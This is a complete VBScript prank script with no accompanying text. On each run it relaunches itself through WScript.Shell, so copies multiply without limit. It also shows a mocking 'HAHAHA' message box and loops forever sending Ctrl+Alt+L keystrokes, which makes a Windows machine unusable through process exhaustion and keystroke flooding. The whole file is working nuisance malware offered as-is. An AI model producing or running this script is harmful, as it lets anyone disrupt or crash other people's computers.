Set auto=CreateObject("wscript.shell")
    CreateObject("WScript.Shell").Run WScript.ScriptFullName
    x=msgbox("HAHHAHAHAHHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHHAHHAHAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHHAHAHAHHAHAHAHAHAHAHAHHAHAHA",0,"HAHHAHAHAHHAHAHAHHAHAHAHAHAHAHAHHAHAHA")
do
     auto.sendkeys "%^l"
loop
